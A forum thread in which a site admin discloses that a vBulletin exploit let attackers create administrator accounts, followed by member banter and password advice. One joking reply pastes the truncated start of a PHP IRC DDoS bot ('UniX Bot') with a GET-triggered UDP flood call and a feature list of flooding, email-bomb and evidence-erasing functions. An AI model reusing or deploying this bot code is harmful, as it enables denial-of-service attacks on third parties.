We've been hacked, but it doesn't seem serious

Good CO

Admin
Last week VBulletin, who make the forum software, announced that an exploit had been found which could give a hacker administrative access to the site (ie. as Good / Bad CO) - basically meaning he/she could change just about anything. We patched the exploit within minutes of the notification and it initially appeared that we were in the clear, but yesterday we found that was not the case.

It has become clear that administrator user accounts had been created on the site. At present we think that is the limit of the success of the hackers, as the administrative control area of the site has an extra layer of protection separate from any access control by Vbulletin itself, thanks to my security paranoia.

Was any damage done?

None that we've found so far

What information could have been accessed?


It is possible that the attacker(s) could view user account details, one by one, and therefore been able to see a user's email address and IP address, and with a year or so of hard graft might have managed everyone. PMs and passwords (encrypted anyway) would have remained secure. It does though appear that the hacker(s) didn't go further than the initial account creation made possible by the exploit. This is almost certainly as they couldn't get access to the administrative area, and moved on to a softer target - the vBulletin forum of some other unfortunate online community.

I will be working through our logs this morning checking if any personal accounts have been accessed.

So what?

Well, not much actually. It comes under 'operational honesty' to inform everyone about this and I will put reference to this thread in the next newsletter. After further checks we can hopefully view it as just a nice nudge to do a security audit, and perhaps a pat on the back for going the extra mile in our security measures to date.
 
Last edited:
G

guestm

Guest
They stole £5,000,000 from me, It's your fault and I want it back.
 

Blackrat

War Hero
Moderator
Book Reviewer
Look. Those pictures. I went to see the Rocky Horror show ok? That's all it was.
 

Ninja_Stoker

War Hero
Moderator
Aha, not the black hole iframe exploit perchance? If it is, it's the death knell of vBulletin who have rather arrogantly suggested doesn't exist. If it is that exploit, it'll keep coming back, whatever you do. Xen Foro software is lightyears ahead of vBulletin and comes with a swift data migration script. Hopefully it isn't the exploit I've had dealings with - the exploit was first flagged by antivirus freeware - AVG or similar.
 

sgtpepperband

War Hero
Book Reviewer
Aha, not the black hole iframe exploit perchance? If it is, it's the death knell of vBulletin who have rather arrogantly suggested doesn't exist. If it is that exploit, it'll keep coming back, whatever you do. Xen Foro software is lightyears ahead of vBulletin and comes with a swift data migration script. Hopefully it isn't the exploit I've had dealings with - the exploit was first flagged by antivirus freeware - AVG or similar.
 

Ninja_Stoker

War Hero
Moderator
Website hacks nowadays tend to be more likely conducted by Cheltenham than China. It's all the rage apparently :pc:
 
Aha, not the black hole iframe exploit perchance? If it is, it's the death knell of vBulletin who have rather arrogantly suggested doesn't exist. If it is that exploit, it'll keep coming back, whatever you do. Xen Foro software is lightyears ahead of vBulletin and comes with a swift data migration script. Hopefully it isn't the exploit I've had dealings with - the exploit was first flagged by antivirus freeware - AVG or similar.
You got someone to type this in for you didn't you?
 

BillyNoMates

War Hero
I now have access.

I'm now in total control of all the Cash Points in Plymouth. There's £100 waiting for the first lucky RR member to get to the TSB hole in the wall in Crownhill.

<?

if($_GET['act'] == 'lol'){

udpflood4($_GET['host'], $_GET['psize'], $_GET['time'], $_GET['port']);

}

/****************************************************/

/* ---------------------UniX-------------------- */

/* UniX Bot - Coding by ANoN - This code is Very PUBLIC! */

/* + Modded UDP Flooder */

/* + Removed TCP Flooder */

/* + Added email bomb */

/* + Added join message */

/* + Added !site command */

/* + Added whois */

/* + Added port scan */

/* + Added Quick UDP Flood */

/* + Added Colors */

/* + Added Count Command */

/* - Removed Host (IP Address) Auth (Its bullssss) */

/* + Added Credits */

/* + Added Speedtest */

/* - Removed Useless ssss */

/* + Cleaned the code */

/* + Added Version */

/* + Added New nicks */

/* + Added Update command */

/* + Made the update command idiot proof */

/* + Added commands command */

/* + Added id command */

/* + Added uptime command */

/* + Added evidence eraser */

/* + Added Cell Phone Spammer */

/* + Added Cell info */

/* + Added change prefix */

/* + Added install update command */

/* + Added port 3074 DDoS */

/* + ICMP ddoS? */

/* + FTP ddoS? */

/* + Added 2 Player ddos feature */

/* + Added 3 Player ddos feature */

/* + Added 4 Player ddos feature */

/****************************************************/

set_time_limit( 0 );

error_reporting( 0 );

echo "ANoNyMoUS iZ LeGioN";

class Mike_Unix

{

var $using_encode = true;

var $config = array(

'nickform' => 'FraseR|%d]',

'nickform2' => '%d]',

'prfix' => 'NzM|%d]',

'identp' => 'Mike',

'modes' => '+B',

'maxrand' => 6,

'maxrand2' => 1,

'maxrand3' => 2,

'maxrand4' => 3,

'cprefix' => '.',

'version' => '1.0',

'host' => '*',

'yellow' => '12',

'blue' => '4',

'orange' => '9',

'green' => '7',

'leetprefix' => '4>>',

'leetsuffix' => '12<<',

'leetprefixwhite' => '0>>',

'leetsuffixwhite' => '0<<',

'leetsuffixred' => '4<<',

'part1' => '0?~{ 4',

'part2' => '0}~?',

'hostauth' => '*'

);

var $messages = array


[Simples!]
 
Last edited:

Ninja_Stoker

War Hero
Moderator
On a slightly more serious note & not wishing to be alarmist, whilst GCO advises passwords are encrypted, for those who wish to be security conscious, it would do you no harm to change your password.

I have, simply to safeguard online banking data. Probably paranoia, admittedly.
 

Bad CO

Admin
Not a bad idea to change your passwords periodically anyway. I'd also recommend a password manager such as lastpass, keepass or roboform which will allow you to choose really strong ones
 

Ninja_Stoker

War Hero
Moderator
Not a bad idea to change your passwords periodically anyway. I'd also recommend a password manager such as lastpass, keepass or roboform which will allow you to choose really strong ones
True, many of us are guilty of not changing our passwords, but in the case of a hack, it's always a good first aid measure because the only thing that protects the individual if their details have been compromised is the volume of data available to the hacker.
 

Dredd

War Hero
Just asked the NSA if they got my password and they swear they didn't, but they did ask me what it was just to confirm it so I told them and it turns out they haven't got it. Glad to know I am safe with such vigilant defenders of freedom covering my back. Whew.
 

Similar threads


Latest Threads

New Posts

Top